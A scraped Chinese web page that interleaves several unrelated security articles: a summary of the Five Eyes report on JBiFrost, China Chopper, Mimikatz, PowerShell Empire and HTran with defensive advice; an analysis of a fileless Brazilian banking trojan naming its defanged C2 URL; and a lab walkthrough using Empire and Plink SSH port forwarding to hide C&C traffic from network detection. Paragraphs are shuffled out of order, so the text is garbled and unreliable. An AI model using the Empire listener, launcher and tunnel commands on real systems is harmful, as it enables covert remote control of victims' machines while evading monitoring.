C通信流量,5种最常用的黑客工具

2019-11-03 作者:关于js06游戏   |   浏览(200)

1. JBiFrost远程访问木马

当运行环境版本低于 Windows 7, 8, 8.1, 10 或不是 Windows 操作系统的话,木马会终止运行,因为用来收集邮件地址、GoogleChrome Login Data 和 OPENSSL 到 C2 的函数库不支持 Windows xp 及更早版本。而且攻击中使用的 RADMIN 版本不支持低于 Windows 的系统。

接下来,要设计一个强有力的安全意识培训方案。这并不意味着要定期进行安全练习,或偶尔向员工发送钓鱼测试邮件。这里需要我定一套安全操作流程,并且让员工有效地意识到电子邮件附件的危险性,防止员工无意识地点击陌生链接。因为很多无文件型恶意软件攻击都是通过一封简单的网络钓鱼邮件开始的,因此这样的安全培训或操作方案是非常重要的。

示例如下:

HTran可以将自身注入正在运行的进程并安装rootkit来隐藏与主机操作系统的网络连接。使用这些功能还可以创建Windows注册表项,以确保HTran保持对受害者网络的持久访问。

图片 1

图片 2

三、实验步骤

英国国家网络安全中心表示,虽然有大量的RAT活跃于世,但是JBiFrost开始越来越多地被用于针对关键国家基础设施所有者及其供应链运营商的针对性攻击活动之中。

图片 3

更新访问权限和特权账号

第2部分表示:通讯数据会从本地的9906端口上被转发,最终被转发到10.1.0.2的3306端口。

防御建议

图片 4

第三,安全团队需要了解Windows内置代码的操作行为,这样就可以在第一时间发现异常情况。比如说,如果在/TEMP目录中发现了隐藏的PowerShell脚本,那就需要小心了。

Empire工具类似Metasploit,详细使用教程可参考一篇文章精通PowerShell Empire。

该报告主要涵盖了五大类别,包括远程访问木马、web shells、凭证窃取程序、横向移动框架以及C2混淆器。

图 2. 含有下载的字符串脚本的 batch 文件代码

组织应该了解无文件型恶意软件的攻击机制,因为就算点击了一封邮件中的恶意附件,也并不意味着电脑就会立即感染恶意软件。因为很多恶意软件会在目标系统所处的网络环境中进行横向渗透,并寻找更加有价值的攻击目标,比如说域控制器或Web服务器等等。为了防止这种情况的发生,应该对组织内的网络系统以及相应访问权限进行仔细划分,尤其是针对第三方应用程序和用户进行划分。

e) 使用私钥进行登录ssh登录

NCSC表示,定期修补和更新补丁程序,以及使用现代防病毒程序可以阻止大多数变种。组织还应该针对重要网络资产实施额外的防病毒检测。此外,培训用户和企业员工的网络钓鱼意识也至关重要。

图 1. 无文件银行木马感染链分析

目前,针对企业环境的无文件型恶意软件威胁正在日趋增长。无文件型恶意软件所使用的代码不需要驻留在目标Windows设备上,而普通的Windows安装程序涉及到很多的东西:PowerShell、WMI、VB、注册表键和.NET框架等等,但对于无文件型恶意软件来说,它们在实现目标主机感染时,并不需要通过文件来调用上述组件。

利用SSH的端口转发搭建SSH隧道。

2017年,Mimikatz 重新回到了人们的视线中,它成为了 NotPetya 和 BadRabbit的组成部分,而这两个勒索蠕虫已经击垮了乌克兰,并且蔓延到整个欧洲、俄罗斯和美国。其中,仅 NotPetya 就导致了马士基、默克和联邦快递等公司数千台电脑的瘫痪,已经造成 10 亿多美元的损失。

图片 5

图片 6

使用工具(如Empire、Metasploit等)构建C&C。

  • 无法以安全模式重新启动计算机;
  • 无法打开Windows注册表编辑器或任务管理;
  • 磁盘活动和/或网络流量显着增加;
  • 尝试连接已知的恶意IP地址;
  • 使用模糊或随机名称创建新文件和目录;

恶意软件还会释放和安装黑客工具 RADMIN 以及从 GitHub 文件夹中下载的配置文件,安装在锥面的文件夹 RDP Wrapper 中。恶意软件会通过配置文件注册表来隐藏所有远程访问活动,当用户退出系统后,攻击者就可以登陆并获取管理权限,并隐藏屏幕活动。

此外,任何想要深入了解无文件型攻击的研究人员都应该去看一看开源项目-AltFS。这是一个完整的无文件型虚拟文件系统,可以用来演示无文件技术的工作机制,而且该项目可以直接在Windows或macOS平台上搭建使用。

安装Open-SSH Server端

4. PowerShell Empire

总结

部署SSL证书,使用HTTPS加密传输协议

d) 复制公钥到某用户home目录下的.ssh文件夹下,注必须使用以下命令在受控主机(本次实验使用win 7进行模拟)进行复制,否则文件权限设置易出错。

最后,NCSC表示,事实上,只需要通过一些基础的网络卫生措施,就可以帮助公司实现其业务目标并有效地抵御这些攻击。这些基础的网络卫生措施包括网络分区、确保安装防病毒软件、及时更新补丁程序,以及针对面向互联网的系统进行积极地监控管理等等。

系统重启和用户登陆后,恶意软件就会删除所有的 Google .LNK,并修改 LNK 的指针 cmd.exe /C copy "C:UsersPublicChrome.LNK" ,"%Application Data%MicrosoftInternet ExplorerQuick LaunchUser PinnedImplicitAppShortcutsGoogle Chrome.LNK" 来替换 Google .LNK 为恶意 .LNK 文件来运行恶意文件。然后释放 batch 文件来加载木马,并将其隐藏到 Google Chrome 扩展中。恶意软件在执行前会扫描系统来搜索特定的字符串,如果检测到开源开发工具或调试器或 cvv digo de seguran 这样的特殊字符串就停止运行。恶意软件还会监控用户访问的网站,当点击 #signin 或 #login-signin 这样的按钮后,就开始监控系统并发送到 C2。

确保公司内部环境的安全

注意:以上命令执行成功后,需要保持命令行不要关闭。同时可以组合使用SSH的其他参数进行后台运行、不交互等。

NCSC表示,想要识别潜在的恶意脚本,就应该全面记录PowerShell活动。这应该包括脚本块日志记录和PowerShell脚本。此外,通过使用脚本代码签名、应用程序白名单以及约束语言模式的组合,也能够防止或限制恶意PowerShell在成功入侵时可能造成的影响。

恶意软件会在开始菜单中释放 .LNK 文件,迫使系统在 3 分钟后重启,并且会锁屏以迫使用户输入用户名和密码。利用系统的安全登陆特征,恶意软件可以检测到输入的错误凭证,并通知用户再次输入。恶意软件还可以用用户的正确凭证登陆系统,并将凭证发送到 C2 服务器,并删除开始菜单中释放和创建的文件和文件夹以隐藏恶意行为的痕迹。另一个木马会打开 outlook 来收集保存的邮箱地址,然后发送到 C2 服务器。如果机器没有安装 outlook,就执行下一步但是跳过发送收集的邮箱地址。

因此,安全团队应当遵循“最少权限”的原则,及时检查已过期账户的访问权限,并根据需要限制某些账号的特权。除此之外,组织还要禁用那些不需要的Windows程序,因为并不是每个员工都需要在自己的计算机上运行PowerShell或.NET框架的。当然了,也可以移除像SMBv1这样的遗留协议,而这类协议也是WannaCry能够为非作歹的主要原因。

2.2 Empire工具简介

5. HUC数据包发送器

图 6. 安装的 HKTL_RADMIN.

鉴于这类日趋严重的安全威胁,安全团队可以做些什么来保护他们的组织抵御无文件型恶意软件呢?

-L 本地转发

防御建议

无文件恶意软件已经不是一个新名词,但是也在不断的发展中,现有了的自动化分析和检测技术仍然很难检测和拦截。研究人员建议用户使用最小权限原则,并加强对职员的信息安全意识培训。

虽然无文件攻击日益猖獗,但微软方面并没有停滞不前。实际上,他们已经开发出了一个名为“反恶意软件扫描接口”的开放接口,而且很多供应商已经开始使用它来检测无文件型恶意软件攻击了,尤其是在分析脚本行为时,这个接口的作用就体现得更加明显了。

注:生成的Powershell代码直接复制并保存,以备在受控windows主机(win7、win10)执行。

PowerShell Empire框架于2015年被设计为合法的渗透测试工具,是一个PowerShell后期漏洞利用代理工具,同时也是一款很强大的后渗透测神器。

该攻击活动被黑的攻击者还在不断更新其恶意软件。Payload 中融合了多个特征,包括使用 RADMIN 增加了受感染的主机被滥用作为僵尸网络的可能性。

利用PowerShell来实现攻击已经很常见了,基于PowerShell的漏洞攻击杀伤力有多么强大,因为恶意代码可以直接在PC内存中执行。此外,PowerShell还可以用于远程访问攻击或绕过应用白名单保护等等。

本文想通过标准的SSH的端口转发建立SSH形式的加密隧道,用于加密、隐蔽传输恶意流量,从而避免通过流量检测发现恶意行为。复现实验部分以C&C通信流量为例进入实验。通过SSH隧道进行加密和隐藏的C&C流量在外部流量特征分析仅表现为标准SSH流量。

图片 7

图 4. 释放和重命名的样本,看似是合法的 Windows 文件

图片 8

测试SSH登录是否成功

该联合报告的根本目标是帮助网络维护者和系统管理员更好地组织其工作。此外,该报告还提供了关于限制这些工具的有效性,以及检测其在网络上的使用的建议。

网络犯罪分子通过便捷的在线银行服务来对目标发起攻击,考虑到这 3 个银行在巴西、拉美地区都是最大的,企业和个人用户都可能会成为感染和攻击的入口。除了窃取在线银行凭证和远程访问系统,攻击者还会收集用户邮箱中的联系人邮箱地址用于大规模的垃圾邮件攻击活动,而且可能会被用于钓鱼和 BEC 攻击。

抗争到底!

b) 开启sshd支持RSA认证选项,并添加认证公钥路径地址

Mimikatz,由法国程序员Benjamin Delpy于2007年开发,主要通过名为Local Security Authority Subsystem Service的Windows进程收集登录目标Windows计算机的其他用户的凭据。

除了访问用户银行账户外,从用户访问的网站中窃取的 PII 和记录的机器凭证会被进一步滥用甚至出售。考虑到金融服务和客户的基础,研究人员认为攻击者可能在不断发展更大的僵尸网络或大规模的邮件目标攻击。

文章来源于:FreeBuf

2.2 Empire工具安装

本文作者:Jasmine 转载自:

图 3. 从 URL 下载和执行 PowerShell 脚本的脚本

正如大家所看到的那样,对抗无文件攻击需要我们扎扎实实地做好很多细节工作,并在各种工具与技术之间进行仔细协调。随着越来越多不可预见的恶意软件威胁出现,各大组织更应该采取措施来加强自身的安全防御。

实验说明:使用两台虚拟机ubuntu16 + windows 7,其中ubuntu16模拟控制端,windows 7模拟受控主机。

虽然,这些工具开发初衷通常并非用于恶意企图,而是帮助网络管理员和渗透测试人员查缺补漏,但是,渐渐地,这些工具自身所具备的强大特性却吸引了越累越多恶意行为者的关注,并开始频繁地将其用于恶意攻击活动中。

图片 9

图片 10

Plink相关参数

图片 11

图片 12

当恶意软件成功渗透目标组织的网络系统后,随着恶意软件的横向渗透,攻击者可以利用PowerShell来实现提权。比如说,攻击者可以发送反向DNS请求,枚举出网络共享的访问控制列表,并查找出特定域组的成员。

图片 13

首先,防御者应该禁止在LSASS内存中存储明文密码。这是Windows 8.1 / Server 2012 R2及更高版本的默认行为,但用户可以在安装了相关安全修补程序的旧系统上更改这种默认设置。

研究人员近日分析了一个含有多个 .bat 附件的无文件恶意软件,可以下载含有银行木马 payload 的 powershell,并安装黑客工具和信息窃取器。研究人员分析发现,恶意软件会窃取机器信息和用户凭证、扫描与特定巴西银行相关的字符串和其他与保存的 outlook 联系人相关的网络链接、安装黑客工具 RADMIN。统计数据表明受感染最严重的区域有巴西和中国台湾。

HTTPS是一项相对安全的加密传输协议,是HTTP的升级版。HTTPS=HTTP+SSL,其中SSL及其继任者TLS是为网络通信提供安全及数据完整性的一种安全协议。TLS与SSL在传输层对网络连接进行加密,防止传输数据被他人窃取、窥视或篡改。

第1部分,-L选项表示使用“本地转发”建立ssh隧道。“本地转发”表示本地的某个端口上的通讯数据会被转发到目标主机的对应端口。

正如计算机商业评论在5月份指出的那样,Windows 10版本1803中的大量安全更新将可以阻止从lsass.exe窃取凭据。

行为分析

最后,为了确保不被攻击者利用MS Office恶意宏来实现攻击,也应该尽可能地禁用宏功能,不过这并不是一种通用解决方案,因为很多用户仍然需要宏功能来完成他们的工作。

listeners #进入的界面下可输入list查看以设置的监听 uselistener http #输入 info查看必填参数 set Name 4444 #本次实验通过SSH隧道通信,因此设置监听127.0.0.1:4444 set Port 4444 set Host 127.0.0.1 execute #创建命为4444的监听,监听127.0.0.1:4444上通信数据

不可否认,这确实是一篇很棒的报告,突出了攻击者如何使用最简单的方法来危害其受害者,以及这些工具如何变得越来越有用,能够帮助攻击者降低攻击成本。

感染后,木马会连接到 hxxp://35 [ . ] 227 [ . ] 52 [ . ] 26/mods/al/md [ . ] zip 来下载 PowerShell 代码,并连接到 hxxp://35 [ . ] 227 [ . ] 52 [ . ] 26/loads/20938092830482 来执行代码,连接到其他 URL、提取和重命名文件。这些被重命名的文件看似是有效的 Windows 函数,如可执行文件和图像文件。

为了抵御无文件型恶意软件的攻击,首先我们要确保组织网络系统内的计算机安装了最新的补丁程序。很多攻击者会利用旧版本系统中未修复或延迟修复的漏洞,而“永恒之蓝”漏洞就是一个很好的例子(该漏洞的补丁要先于漏洞利用程序的发布)。

Empire是一个针对windows平台、提供从Stager生成到提取和渗透维持一系列功能齐全的渗透攻击框架,其最 大的特点是以PowerShell脚本作为攻击载荷,而且Empire实现了无需powerShell.exe就可运行PowerShell代理功 能,即它是一个纯粹的PowerShell后期漏洞利用代理工具。快速部署后期漏洞利用模块,内置模块有键盘记录、 Mimikatz、绕过UAC、内网扫描等等,并且能够适应通信躲避网络检测和大部分安全防护工具的查杀,简单来说 Empire类似于渗透神器Metasploit,是一个基于PowerShell的远程控制木马。

其次,无论在何处发现了Mimikatz的活动痕迹,您都应该进行严格的调查,因为Mimikatz的出现就表明攻击者正在积极地渗透您的网络。此外,Mimikatz的一些功能需要利用管理员账户来发挥效用,因此,您应该确保仅根据需要授权管理员账户。在需要管理访问权限的情况下,您应该应用“权限访问管理原则”。

图 5. 木马强制受感染的机器重启以收集用户凭证和保存的邮箱地址

这个过程通常被称之为Process Hollowing,在这种机制下,恶意软件可以使用一个特定进程来作为恶意代码的存储容器以及分发机制。近期研究人员就发现有攻击者将PowerShell、VB脚本和.NET应用整合进了一个代码包中。

在实验虚拟linux系统中安装

图片 14

图片 15

一、背景简介

图片 16

本次实验使用Empire生成简单的PowerShell脚本,建立最简单的C&C通信。下面简单概括主要步骤。

该报告重申了对基本安全卫生的需求,强调了针对受损系统的入侵活动通常会利用一些常见的安全漏洞,例如未修补的软件漏洞等等。下述这些工具一旦实现入侵就会发挥作用,允许攻击者在受害者的系统内进一步实现其恶意企图。

本地转发主要使用SSH的 -L参数解释:

近日,英国国家网络安全中心在其与“五眼”情报合作伙伴(澳大利亚、加拿大、新西兰和美国)的联合报告中,公布了最常用和公开可用的黑客工具及技术清单。

7) 至此以成功使用SSH隧道传输C&C通信流量,后续可在此基础上设计实现其他C&C控制命令及其它恶意功能。

现代的、经过正确配置和仔细审查的网络监控工具和防火墙,通常能够检测出来自HTran等工具的未经授权的连接。此外,NCSC指出,HTran还包括一个对网络防御者有用的调试条件。在目的地不可用的情况下,HTran会使用以下格式生成错误消息:sprint(buffer, “[SERVER]connection to %s:%d errorrn”, host, port2);该错误消息会以明文形式中继到连接客户端中。网络防御者可以监视该错误消息,以便检测自身环境中活跃的HTran实例。

#需要首先进入Plink.exe文件所在路径 Plink.exe -ssh -l 登录用户名 -pw 登录密码 SSH主机IP

防御建议

查看本机IP(linux命令:ifconfig),如在windows下的XShell工具下输入Server IP 输入登录名和密码,成功登入系统则SSH Server端搭建成功。

并且,它主要聚焦JBiFrost、China Chopper、Mimikatz、PowerShell Empire以及HTran这5款黑客工具。

Plink端口转发设计

图片 17

配置RSA密钥对认证登录

木马这个词源自于经典的特洛伊战争故事,一群希腊士兵藏在一个巨大的木马中,并进入特洛伊城,然后跳出来大肆攻击敌人。而在计算机世界里,木马是种恶意软件,通过电子邮件或恶意网页偷偷进入并安装在你的计算机上。一旦进入后,恶意软件就可以做各种坏事了。

ssh-keygen -t rsa

据了解,五眼(Five Eyes),是指二战后英美多项秘密协议催生的多国监听组织“UKUSA”。该组织由美国、英国、澳大利亚、加拿大和新西兰的情报机构组成。这五个国家组成的情报间谍联盟内部实现互联互通情报信息,窃取来的商业数据在这些国家的政府部门和公司企业之间共享。

图片 18

一旦设备遭到入侵,“中国菜刀”就可以使用文件检索工具“wget”将文件从Internet下载到目标,并编辑、删除、复制、重命名以及更改现有文件的时间戳。

-ssh 指定使用特定连接协议

感染迹象包括:

安装成功后,确认Empire目录下所有文件如下图:

以最近的一个攻击案件为例:2017年,黑客组织APT19在多起针对跨国法律与投资公司的钓鱼攻击活动,就使用了嵌入宏的Microsoft Excel文档,而该文档就是由PowerShell Empire生成的。

5) ubuntu端切换到agents界面,list命令查看如图:

报告强调,为了更广泛地检测web shells,网络防御者应该专注于发现Web服务器上的可疑进程执行(例如PHP二进制文件生成进程),或者来自Web服务器的错误模式出站网络连接。

本次实验使用Empire工具快速搭建C&C信道,本文只简要介绍对于Empire工具。在Windows平台下使用Plink.exe工具的SSH功能搭建SSH隧道。

据悉,JBiFrost RAT是一款基于Java的、跨平台且多功能的远程访问木马。它可以对多种不同的操作系统构成威胁,具体包括Windows、Linux、MAC OS X以及Android。JBiFrost允许恶意行为者在网络上横向移动,或安装其他恶意软件。它主要通过网络钓鱼电子邮件作为附件进行传播。

生成简单的PowerShell利用脚本(针对windows)

事实上,最初Benjamin Delpy只是将Mimikatz作副项目来开发,旨在更加了解Windows的安全性能和C语言,同时意在向微软证明Windows密码中存在的安全漏洞。但也正如Delpy所言,虽然Mimikatz不是为攻击者设计的,但是它却帮助了他们,任何一个事物,有利就有弊。由于Mimikatz工具功能强大、多样且开源的特性,允许恶意行为者和渗透测试人员开发自定义插件,因此,近年来开始频繁地被众多攻击者用于恶意目的。

将本地端口转发到远程目标主机(192.168.81.137)的目标端口。

它旨在允许攻击者在获得初始访问权限后在网络中移动。此外,它还可用于升级权限、获取凭据、渗漏信息并在网络中横向移动。(类似工具包括Cobalt Strike和Metasploit)

windows下使用Plink.exe(putty工具集中可以在windows系统下使用命令行进行SSH连接)连接SSHServer

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。“webshell”常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。“中国菜刀”就是一种应用非常广的webshell,其大小仅有4kb。

-i 指定RSA私钥登录

有些木马程序被称为远程访问木马,被设计用于远程操纵用户的计算机,让黑客可以完全控制。有些则可能有不同目的,例如窃取个人信息,侧录键盘,甚至将受害者计算机作为僵尸网络的一部分。

3.3 搭建SSH隧道

“五眼”Top5:使用最广泛的黑客工具

配置C&C和SSH参数使二者配合实现加密、隐藏恶意流量的目的。

防御建议

-l 指定登录用户名

检测和缓解“中国菜刀”最有效的方法在于主机自身,尤其是面向公众的Web服务器上。在基于Linux和Windows的操作系统上,有一些简单的方法可以使用命令行搜索Web shell的存在。

编辑/etc/ssh/sshd_config文件中允许口令登录PermitRootLogin配置如下图:

由于它是构建在一个通用的合法应用程序(PowerShell)上,并且几乎可以完全在内存中运行,所以使用传统的防病毒工具很难在网络上检测到Empire。NCSC指出,PowerShell Empire在敌对的国家行为者和有组织的犯罪分子中已经变得越来越受欢迎。

c) 编辑/etc/ssh/sshd_config文件中的PubkeyAuthentication选项配置为yes,即:

3. Mimikatz

2.1 SSH隧道介绍

总结

关键步骤总结:

2. 中国菜刀(China Chopper)

通过本次实验可以看出,攻击者可以利用类似SSH的公共服务或可用技术辅助攻击,且其实现也非常容易。

Mimikatz 能在极短的时间内从计算机内存中抓取 Windows 用户的密码,从而获得该计算机的访问权或者受害人在网络上的其他访问权。如今,Mimikatz 已经成为一种无处不在的黑客渗透工具,入侵者们一旦打开缺口,就能迅速从一台联网设备跳到下一台。

在网络攻防博弈中,网络流量特征分析类安全防御措施得到了广泛应用。众多厂商和企业对网络流量进行恶意流量分析检测,从而针对性的采取防御措施,如各级ISP在骨干网络设备上大多采用网络流量分析检测的防御方案。

HUC数据包发送器是一种代理工具,用于拦截和重定向从本地主机到远程主机的传输控制协议连接。该工具至少自2009年起就已经在互联网上免费提供,并且经常能够在针对政府和行业目标的攻击活动中发现其身影。

二、实验原理

图片 19

sudo apt-get install openssh-server

防御建议

设置监听

第3部分表示:我们创建的ssh隧道是连接到10.1.0.2上的root用户。

a) 生成rsa密钥对

中生成的PowerShell脚本,使受控主机上线

launcher powershell 4444 # 4444为设置的监听名字 #可进入tagers生成其他木马、远控程序,本次实验直接生成最简单PowerShell利用脚本

6) 通过interact命令则可以使用以建立的控制信道控制受控主机,如通过简单的ls命令测试成功如下图:

注:需要重启sshd服务:/etc/init.d/ssh resar

由于SSH的安全性,在数据跨越公网时其他人无法得知数据内容。SSH端口转发有本地转发、远程转发和动态端 口转发三种。本次实验主要以本地转发为例。

SSH 会自动加密和解密所有 SSH 客户端与服务端之间的网络数据。但是, SSH 还能够将其他 TCP 端口的网络数 据通过 SSH 链接来转发,并且自动提供了相应的加密及解密服务。这一过程也被叫做“隧道”( tunneling),这是因 为 SSH 为其他 TCP 链接提供了一个安全的通道来进行传输而得名。SSH隧道的实现主要使用SSH的参数配置进行端 口转发,即将所需传输的数据内容通过加密的SSH隧道进行转发。SSH 端口转发能够提供两大功能:1、加密 SSH Client 端至 SSH Server 端之间的通讯数据。2、突破防火墙的限制完成一些之前无法建立的 TCP 连接。

四、总结

配置SSH Server端

a) windows 7虚拟机另外开启一个CMD窗口,复制PowerShell脚本执行。可以看到受控主机以上线。

3.2 使用Empire工具生成PowerShell脚本备用

搭建SSH服务,并配置为RSA私钥登录(也可以配置为免密登录)。

注:使用putty、winscp等工具时需要先使用对应平台工具进行rsa私钥导入后转化为相对应文件格式,如本次实验使用putty工具导入生成私钥文件sshrsa.ppk。

使用 ./empire启动Empire如下图,则成功安装。

git clone #进入setup目录进行命令行安装 cd Empire cd setup sudo ./install.sh

3.1 在ubuntu系统上搭建SSH服务端

图片 20

本文由js06游戏网址发布于关于js06游戏,转载请注明出处:C通信流量,5种最常用的黑客工具

关键词: